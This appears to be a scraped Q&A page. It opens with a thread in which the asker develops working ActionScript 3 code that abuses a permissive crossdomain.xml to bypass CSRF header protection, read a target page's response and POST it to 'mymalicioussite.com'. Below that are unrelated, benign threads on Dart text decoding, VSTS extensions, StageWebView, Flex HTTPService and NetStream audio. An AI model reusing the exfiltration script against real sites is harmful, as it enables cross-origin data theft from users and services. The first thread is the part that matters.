CSRF Bypass using ActionScript via weak CrossDomain.xml - actionscript

I have a target which has weak CrossDomain.xml but it prevents CSRF attack looking at one of the custom HTTP headers. I found following actionscript on a couple of websites, which works perfectly except that it doesnt set the header.
This actionscript sends a POST request to 'Target.htm' and I need it to set any custom header , say Test-Header:
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
public class FlashTest extends Sprite {
public function FlashTest() {
// write as3 code here..
//Target URL
var header:URLRequestHeader = new URLRequestHeader("Test-Header", "Test123");
var readFrom:String = "http://192.168.100.4/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.data = "ThisDoesNotMatter"
readRequest.method = URLRequestMethod.POST
readRequest.requestHeaders.push(header);
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
}
}
private function eventHandler(event:Event):void
{
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
}
}
}
}
CrossDomain.XML on the target:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>
Any help would be appreciated.
A working code with GET request instead of POST would also work as target accepts both, GET and POST requests. As far as I know, setting custom headers are allowed only with POST request but a GET request with any standard HTTP header would work for me at least for now.

After performing a few tests, I was able to modify the script mentioned above to set any custom header ( except for Referer and User-Agent headers that browsers do not allow):
Also, This works only if the target and attacking machine should have following crossdomain.xml:
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-
domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
And here is the AS3 script that worked for me:
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLLoader;
import flash.net.URLVariables;
import flash.net.URLRequestHeader;
public class FlashTest extends Sprite {
public function FlashTest() {
// write as3 code here..
//Set Header
var headers:Array = [new URLRequestHeader("TestHeader", "Test123")];
//Target URL
var readFrom:String = "http://192.168.253.133/Target.htm";
var readRequest:URLRequest = new URLRequest(readFrom);
readRequest.requestHeaders = headers;
readRequest.data = "ThisDoesNotMatter" //POST data
readRequest.method = URLRequestMethod.POST
//readRequest.requestHeaders.push();
var getLoader:URLLoader = new URLLoader();
getLoader.addEventListener(Event.COMPLETE, eventHandler);
try
{
getLoader.load(readRequest);
}
catch(error:Error)
{
}
}
private function eventHandler(event:Event):void
{
var sendTO:String = "http://mymalicioussite.com";
var sendRequest:URLRequest = new URLRequest(sendTO);
sendRequest.method = URLRequestMethod.POST;
sendRequest.data = event.target.data;
var sendLoader:URLLoader = new URLLoader();
try
{
sendLoader.load(sendRequest);
}
catch(error:Error)
{
}
}
}
}//package

Related

How to encode an Urdu string in Dart?

I extract an Urdu text from a web adress. For example, my text is فروردین. But when I print it, I see 'ÙرÙردÛÙ'. How can I print it correctly?
import 'dart:convert';
import 'package:http/http.dart';
import 'package:html/parser.dart';
import 'package:html/dom.dart';
Future initiate() async {
var client = Client();
Response response = await client.get('https://www.varzesh3.com/');
var document = parse(response.body);
List<Element> links = document.querySelectorAll('tr.match-date > td.text-center');
for (var link in links) {
print(link.text)
//var bytes = utf8.encode(link.text);
}
The problem seems to be the client don't recognize the charset of the page and defaults to latin1. Please take a look at the following code where I force using UTF-8 instead by taking the respond as bytes and convert them to UTF-8 by using the utf8 decoder.
import 'dart:convert';
import 'package:http/http.dart';
import 'package:html/parser.dart';
import 'package:html/dom.dart';
main() async {
var client = Client();
Response response = await client.get('https://www.varzesh3.com/');
var document = parse(utf8.decode(response.bodyBytes), encoding: "utf8");
List<Element> links = document.querySelectorAll(
'tr.match-date > td.text-center');
for (var link in links) {
print(link.text);
}
}

VSTS Extension - Storing parameters from build task and call a web service from summary tab

I need to display the result of a custom build task in summary tab (“ms.vss-build-web.build-results-section”). In order to do this I need to retain some data from build task and use it to call a web service from summary section. Is it possible to store data in a variable using Extension Data Service and use it in summary page? What should be the best approach for this?
Thanks in advance.
I have attached my build task data using a Logging command
https://github.com/Microsoft/vsts-tasks/blob/986f8f5112017474962affe58c9ebaf394fb9354/docs/authoring/commands.md
//Build Task
class TestClass {
_name: string;
_age: number;
constructor(name: string, age:number) {
this._name = name;
this._age = age;
}
}
var data = new TestClass(TinTin,100);
//Create a folder
tl.mkdirP("c:/myfolder/");
//Write data to a file
tl.writeFile("c:/myfolder/mydata.txt",JSON.stringify(data));
//Executes command to attach the file to build
console.log("##vso[task.addattachment type=myAttachmentType;name=myAttachmentName;]c:/myfolder/mydata.txt");
Retrieve the attachment from summary page.
https://github.com/Microsoft/vsts-extension-samples/blob/master/build-results-enhancer/src/enhancer/tab.ts
//Summary Page
/// <reference path="../definitions/Q.d.ts" />
/// <reference path="../definitions/vss.d.ts" />
/// <reference path="../definitions/tfs.d.ts" />
/// <reference path="../definitions/jquery.d.ts" />
import VSS_Service = require("VSS/Service");
import Controls = require("VSS/Controls");
import TFS_Build_Contracts = require("TFS/Build/Contracts");
import TFS_Build_Extension_Contracts = require("TFS/Build/ExtensionContracts");
import DT_Client = require("TFS/DistributedTask/TaskRestClient");
export class StatusSection extends Controls.BaseControl {
constructor() {
super();
}
public initialize(): void {
super.initialize();
// Get configuration that's shared between extension and the extension host
var sharedConfig: TFS_Build_Extension_Contracts.IBuildResultsViewExtensionConfig = VSS.getConfiguration();
var vsoContext = VSS.getWebContext();
if(sharedConfig) {
// register your extension with host through callback
sharedConfig.onBuildChanged((build: TFS_Build_Contracts.Build) => {
var taskClient = DT_Client.getClient();
taskClient.getPlanAttachments(vsoContext.project.id, "build", build.orchestrationPlan.planId, "myAttachmentType").then((taskAttachments)=> {
if (taskAttachments.length === 1) {
var recId = taskAttachments[0].recordId;
var timelineId = taskAttachments[0].timelineId;
taskClient.getAttachmentContent(vsoContext.project.id, "build", build.orchestrationPlan.planId,timelineId,recId,"myAttachmentType","myAttachmentName").then((attachementContent)=> {
function arrayBufferToString(buffer){
var arr = new Uint8Array(buffer);
var str = String.fromCharCode.apply(String, arr);
if(/[\u0080-\uffff]/.test(str)){
throw new Error("this string seems to contain (still encoded) multibytes");
}
return str;
}
var summaryPageData = arrayBufferToString(attachementContent);
//Deserialize data
var ob = JSON.parse(summaryPageData);
console.log("Name: " + ob._name);
console.log("Age: " + ob._age);
});
}
});
});
}
}
}
StatusSection.enhance(StatusSection, $(".build-status"), {});
// Notify the parent frame that the host has been loaded
VSS.notifyLoadSucceeded();
You can do it but the issue is that the those values are always the values from the latest build, the information in summary page would be incorrect for old builds. So I would recommend to the get the build task result via BuildHttpClient2_2 and then show it in the summary page directly.

I want to use StageWebView instead of opening browser iOS

I have a textfield that loads dynamic text from a random node in a xml. Some of these nodes contains hyperlinks.
Below is the code i'm using to setup and load StageWebView and go to the link, if the text i tap has a url
import flash.display.StageAlign;
import flash.display.StageScaleMode;
import flash.events.MouseEvent;
import flash.net.URLRequest;
import flash.media.StageWebView;
import flash.geom.Rectangle;
stage.align = StageAlign.TOP_LEFT;
stage.scaleMode = StageScaleMode.NO_SCALE;
var webView:StageWebView;
var swvRect:Rectangle;
var swvHeight:Number;
var swvY:Number;
var linkURL:String;
storyTxt.addEventListener(MouseEvent.CLICK, linkClicked);
function linkClicked(e:MouseEvent):void {
var idx:int = e.target.getCharIndexAtPoint(e.localX, e.localY);
trace("Tapped:",idx);
var tf:TextFormat = e.target.getTextFormat(idx);
if(tf.url != "" && tf.url != null) {
linkURL = tf.url;
trace(linkURL);
if(webView!=null){
return;
}
webView=new StageWebView();
webView.stage=this.stage;
webView.viewPort=new Rectangle(0,swvY,stage.stageWidth,swvHeight);
webView.addEventListener(ErrorEvent.ERROR,onError);
webView.addEventListener(LocationChangeEvent.LOCATION_CHANGING,onChanging);
webView.addEventListener(Event.COMPLETE,onComplete);
webView.loadURL(linkURL);
}
}
When i tap on the text that has a link, it opens both the mobile's browser [Safari] and the StageWebView. Is there a way of stopping the app switching over to the browser to open the link?
Thanks
Daniel
You could try something like:
function onChanging(event:LocationChangeEvent):void
{
//prevents the loading of the new URL
event.preventDefault();
//open safari/external browser
navigateToURL(new URLRequest(event.location));
}
I don't have a URLRequest/URLLoader function in my code so where can i place e.preventDefault()?
I think it's because of the anchor tag from the xml text that is opening the browser when i tap on the hyperlink text.

could not be able to create http service programmatically in flex

I'm trying to create HttpService through Action Script and I want to convert this mxml code to my Action Script
mxml code code is here:
<s:HTTPService id="weatherService"
url="{BASE_URL}"
resultFormat="object"
result="weatherService_resultHandler(event)"
fault="weatherService_faultHandler(event)"
showBusyCursor="true">
<s:request xmlns="">
<q>{cityName.text.toString()}</q>
<format>{FORMAT}</format>
<num_of_days>{NUMBER_OF_DAYS}</num_of_days>
<key>{API_KEY}</key>
</s:request>
</s:HTTPService>
How to convert this in actionscript?
This might help you and please note here the following code not using binding
import mx.rpc.http.HTTPService;
private function callService():void
{
var requestObj:Object = {};
requestObj.q = cityName.text.toString();
requestObj.format = FORMAT;
requestObj.num_of_days = cNUMBER_OF_DAYS;
requestObj.key = API_KEY;
var weatherService:HTTPService = new HTTPService();
weatherService.url = BASE_URL;
weatherService.resultFormat = "object";
weatherService.showBusyCursor = true;
weatherService.request = requestObj;
weatherService.addEventListener(ResultEvent.RESULT , weatherService_resultHandler);
weatherService.addEventListener(FaultEvent.FAULT, weatherService_faultHandler);
weatherService.send();
}
protected function weatherService_resultHandler(event:ResultEvent):void
{
trace("got result");
}
protected function weatherService_faultHandler(event:FaultEvent):void
{
trace("got fault");
}

ActionScript, NetStream.Play.Failed iOS AIR mobile

I'm trying to stream local audio files in m4a (aac) similar to Tiberiu-Ionuț Stan (http://stackoverflow.com/questions/2036107/aac-mp4-not-working-in-actionscript-3s-netstream):
package
{
import flash.net.NetConnection;
import flash.net.NetStream;
import flash.events.NetStatusEvent;
import flash.events.AsyncErrorEvent;
import flash.events.Event;
public class Mysound
{
private var _connection:NetConnection;
private var _netStream:NetStream;
private var _filePath:String;
private var _client:Object;
public function MainDocument(filePath:String):void
{
_filePath = filePath;
connect();
}
private function connect():void
{
_connection=new NetConnection();
_connection.addEventListener(NetStatusEvent.NET_STATUS, netStatusHandler);
_connection.addEventListener(AsyncErrorEvent.ASYNC_ERROR, asyncErrorHandler);
_connection.connect(null);
}
private function netStatusHandler(event:NetStatusEvent):void
{
switch (event.info.code)
{
case "NetConnection.Connect.Success":
requestAudio();
break;
}
}
private function requestAudio():void
{
_netStream=new NetStream(_connection);
_netStream.addEventListener(NetStatusEvent.NET_STATUS, this._netStatusHandler);
_netStream.addEventListener(AsyncErrorEvent.ASYNC_ERROR, this._asyncErrorHandler);
_client = new Object();
_client.onMetaData = onMetaData;
_netStream.client = _client;
_netStream.backBufferTime = 0;
_netStream.bufferTime = 0.5;
_netStream.bufferTimeMax = 5;
_netStream.play(filePath);
}
private function asyncErrorHandler(event:AsyncErrorEvent):void
{
trace(event);
}
private function onMetaData(metadata:Object):void
{
var str:String = "";
for (var key:String in metadata) {
str += key + ": " + metadata[key];
}
trace(str);
}
}
}
It works for me on emulator but it doesn't on devices (ipads).
I found out that netStatusHandler on device catches status "NetStream.Play.Failed", but i have no idea why, I know that it correctly reads file as it does get correct metadata, it also starts to buffer sound, but fails to play it. Files are in folder next to my app swf so it shouln't be sandbox problem. What else should I try to get it working?

Resources